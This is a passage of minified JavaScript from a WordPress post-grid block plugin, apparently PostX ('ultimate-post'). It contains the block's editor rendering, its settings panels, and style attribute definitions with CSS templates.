o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(53508),c=l(46896),u=l(71411),d=l(93985),m=l(8152),g=l(76005),y=l(99838),b=l(31760),v=l(73151),h=l(69735),f=l(2963),k=l(39349),w=l(87025),x=l(93128);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useRef:E,useState:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=E(null),[l,M]=S(w.Ti),[A,H]=S(null),{setAttributes:N,name:j,clientId:Z,attributes:O,context:R,className:D,isSelected:z,attributes:{blockId:F,currentPostId:W,readMoreIcon:V,excerptLimit:G,metaStyle:q,metaShow:$,catShow:K,overlayContentPosition:J,metaSeparator:Y,titleShow:X,catStyle:Q,catPosition:ee,titlePosition:te,excerptShow:le,imgCrop:oe,imgAnimation:ae,imgOverlayType:ie,imgOverlay:ne,metaList:re,readMore:se,readMoreText:pe,metaPosition:ce,showFullExcerpt:ue,showImage:de,titleAnimation:me,customCatColor:ge,onlyCatColor:ye,contentTag:be,titleTag:ve,showSeoMeta:he,titleLength:fe,metaMinText:ke,metaAuthorPrefix:we,titleStyle:xe,metaDateFormat:Te,authorLink:_e,fallbackEnable:Ce,vidIconEnable:Ee,notFoundMessage:Se,dcEnabled:Pe,dcFields:Le,previewImg:Ie,advanceId:Be,paginationShow:Ue,paginationAjax:Me,headingShow:Ae,filterShow:He,paginationType:Ne,navPosition:je,paginationNav:Ze,loadMoreText:Oe,paginationText:Re,V4_1_0_CompCheck:{runComp:De}}}=e;function ze(e){M({...l,selectedDC:e})}function Fe(){M({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function We(e){M({...l,section:{...w.ZQ,[e]:!0}}),(0,w.Rt)(e),(0,w.ob)(e)}function Ve(e){M((t=>({...t,toolbarSettings:e}))),(0,w.os)(e)}function Ge(){l.error&&M({...l,error:!1}),l.loading||M({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(O)}).then((e=>{M({...l,postsList:e,loading:!1})})).catch((e=>{M({...l,loading:!1,error:!0})}))}C((()=>{(0,w.oA)(),Ge()}),[]),C((()=>{const t=Z.substr(0,6),l=B(U(Z));(0,a.qi)(N,l,W,Z),(0,v.h)(e),F?F&&F!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||N({blockId:t})):(N({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&N({queryType:"archiveBuilder"}))}),[Z]),C((()=>{const e=t.current;(0,h.o6)()&&0===O.dcFields.length&&N({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,O)&&(Ge(),t.current=O),e.isSelected!==z&&z&&(0,w.gT)(We,Ve)):t.current=O}),[O]);const qe={settingTab:A,setSettingTab:H,setAttributes:N,name:j,attributes:O,setSection:We,section:l.section,clientId:Z,context:R,setSelectedDc:ze,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){ze(e),Ve("dc_group")}};let $e;if(F&&($e=(0,y.Kh)(O,"ultimate-post/post-grid-2",F,(0,a.k0)())),Ie&&!z)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Ie});C((()=>{z&&O.previewImg&&N({previewImg:""})}),[e?.isSelected]);const Ke=_({...Be&&{id:Be},className:`ultp-block-${F} ${D}`,onClick:e=>{e.stopPropagation(),We("general"),Ve("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:qe,selected:l.toolbarSettings}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:qe})),(0,o.createElement)(b.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["wrapOuterPadding","wrapMargin","spaceSep"]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[De?"exclude":"dep"]:a.N2}],store:qe}),(0,o.createElement)("div",Ke,$e&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:$e}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ae||He||Ue)&&(0,o.createElement)(r.Z,{attributes:O,setAttributes:N,onClick:()=>{We("heading"),Ve("heading")},setSection:We,setToolbarSettings:Ve}),function(){const e=`${be}`,t=(e,t)=>(0,h.o6)()&&Pe&&(0,o.createElement)(k.Z,{idx:e,postId:t,fields:Le,settingsOnClick:(e,t)=>{e?.stopPropagation(),Ve(t)},selectedDC:l.selectedDC,setSelectedDc:ze,setAttributes:N,dcFields:Le});return l.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):l.postsList.length>0?(0,o.createElement)("div",{className:"ultp-block-items-wrap ultp-block-row"},l.postsList.map(((l,a)=>{const r=JSON.parse(re.replaceAll("u0022",'"'));return(0,o.createElement)(e,{key:a,className:`ultp-block-item post-id-${l.ID} ${me?" ultp-animation-"+me:""}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap ultp-block-content-overlay"},(0,o.createElement)(s.E_,{catPosition:ee,imgOverlay:ne,imgOverlayType:ie,imgAnimation:ae,post:l,fallbackEnable:Ce,vidIconEnable:Ee,showImage:de,imgCrop:oe,onClick:()=>{We("image"),Ve("image")},Category:"aboveTitle"!=ee?(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:K,catStyle:Q,catPosition:ee,customCatColor:ge,onlyCatColor:ye,onClick:e=>{We("taxonomy-/-category"),Ve("cat")}})):null}),Ee&&l.has_video&&(0,o.createElement)(s.nk,{onClick:e=>{We("video"),Ve("video")}}),(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${J}`},(0,o.createElement)("div",{className:"ultp-block-content-inner"},t(7,l.ID),"aboveTitle"==ee&&(0,o.createElement)(i.Z,{post:l,catShow:K,catStyle:Q,catPosition:ee,customCatColor:ge,onlyCatColor:ye,onClick:e=>{We("taxonomy-/-category"),Ve("cat")}}),t(6,l.ID),l.title&&X&&1==te&&(0,o.createElement)(g.Z,{title:l.title,headingTag:ve,titleLength:fe,titleStyle:xe,onClick:e=>{We("title"),Ve("title")}}),t(5,l.ID),$&&"top"==ce&&(0,o.createElement)(c.Z,{meta:r,post:l,metaSeparator:Y,metaStyle:q,metaMinText:ke,metaAuthorPrefix:we,metaDateFormat:Te,authorLink:_e,onClick:e=>{We("meta"),Ve("meta")}}),t(4,l.ID),l.title&&X&&0==te&&(0,o.createElement)(g.Z,{title:l.title,headingTag:ve,titleLength:fe,titleStyle:xe,onClick:e=>{We("title"),Ve("title")}}),t(3,l.ID),le&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:G,showFullExcerpt:ue,showSeoMeta:he,onClick:e=>{We("excerpt"),Ve("excerpt")}}),t(2,l.ID),se&&(0,o.createElement)(m.Z,{readMoreText:pe,readMoreIcon:V,titleLabel:l.title,onClick:()=>{We("read-more"),Ve("read-more")}}),t(1,l.ID),$&&"bottom"==ce&&(0,o.createElement)(c.Z,{meta:r,post:l,metaSeparator:Y,metaStyle:q,metaMinText:ke,metaAuthorPrefix:we,metaDateFormat:Te,authorLink:_e,onClick:e=>{We("meta"),Ve("meta")}}),t(0,l.ID),(0,h.o6)()&&Pe&&(0,o.createElement)(f.Z,{dcFields:Le,setAttributes:N,startOnboarding:Fe,overlayMode:!0,inverseColor:!0})))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:Se})}(),Ue&&"loadMore"==Ne&&(0,o.createElement)(p.Z,{loadMoreText:Oe,onClick:e=>{We("pagination"),Ve("pagination")}}),Ue&&"navigation"==Ne&&"topRight"!=je&&(0,o.createElement)(u.Z,{onClick:()=>{We("pagination"),Ve("pagination")}}),Ue&&"pagination"==Ne&&(0,o.createElement)(d.Z,{paginationNav:Ze,paginationAjax:Me,paginationText:Re,onClick:e=>{We("pagination"),Ve("pagination")}}))))}},93128:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(69735),p=l(82473),c=l(87282),u=l(87025),d=l(92637),m=l(43581);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8,b=e=>{const{store:t}=e,{queryType:l,advFilterEnable:n,advPaginationEnable:r,V4_1_0_CompCheck:{runComp:s}}=t.attributes,{context:p,section:y,settingTab:b,setSettingTab:v}=t;return g((()=>{(0,u.CH)(p,n,t,r)}),[n,r,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(m.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6830",store:t}),(0,o.createElement)(d.Sections,{settingTab:b,setSettingTab:v},(0,o.createElement)(d.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:c.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:c.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(d.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{initialOpen:y.general,store:t,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columnGridGap"],include:[{position:2,data:{type:"range",key:"columnGridGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Gap","ultimate-post")}},{position:3,data:{type:"range",key:"overlayHeight",min:0,max:700,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:y.title}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:y.image,include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgWidth","imageScale","imgHeight","imgMargin","imgCropSmall"],hrIdx:[{tab:"settings",hr:[2,10]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,initialOpen:y.meta,depend:"metaShow",exclude:["metaListSmall"],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:y["taxonomy-/-category"],store:t,depend:"catShow",hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{depend:"excerptShow",isTab:!0,initialOpen:y.excerpt,store:t,hrIdx:[3,6]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:y["read-more"],depend:"readMore"}),(0,o.createElement)(a.rS,{initialOpen:y.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.fm,{store:t,include:a.aG,exclude:["overlaySmallHeight"]}),!s&&(0,o.createElement)(i.Z,{open:y.filter||y.pagination||y.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:y.heading,depend:"headingShow"}),"posts"!=l&&"customPosts"!=l&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:y.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,store:t,initialOpen:y.pagination,depend:"paginationShow",hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(d.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:c,titleShow:u,catPosition:d,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,u&&0==m,i&&"top"==b,u&&1==m,f&&"aboveTitle"==d];if((0,s.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(p.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"],exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"]}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(a.sT,{store:t,attrKey:"titleTypo",label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exStyle:["imgWidth","imageScale","imgHeight","imgMargin"],exSettings:["imgCropSmall"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},75108:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},columns:{type:"object",default:{lg:"3",sm:"2",xs:"1"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-template-columns: repeat({{columns}}, 1fr); }"}]},columnGridGap:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-gap: {{columnGridGap}}; }"}]},overlayHeight:{type:"object",default:{lg:"250",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-empty-image { width: 100%; object-fit: cover; height: {{overlayHeight}}; }"}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!1},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},queryExcludeAuthor:{type:"string",default:"[]",style:[{depends:[{key:"queryAuthor",condition:"==",value:"[]"},{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover { text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a { background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titleAnimation:{type:"string",default:""},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"rgba(255,255,255,0.70)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"26",unit:"px"},decoration:"none",family:"",weight:"600"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title, \n          {{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgAnimation:{type:"string",default:"zoomOut"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap, \n          {{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap:hover, \n          {{ULTP}} .ultp-block-content-wrap:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay:hover"}]},imgOverlay:{type:"boolean",default:!0},imgOverlayType:{type:"string",default:"flat",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: 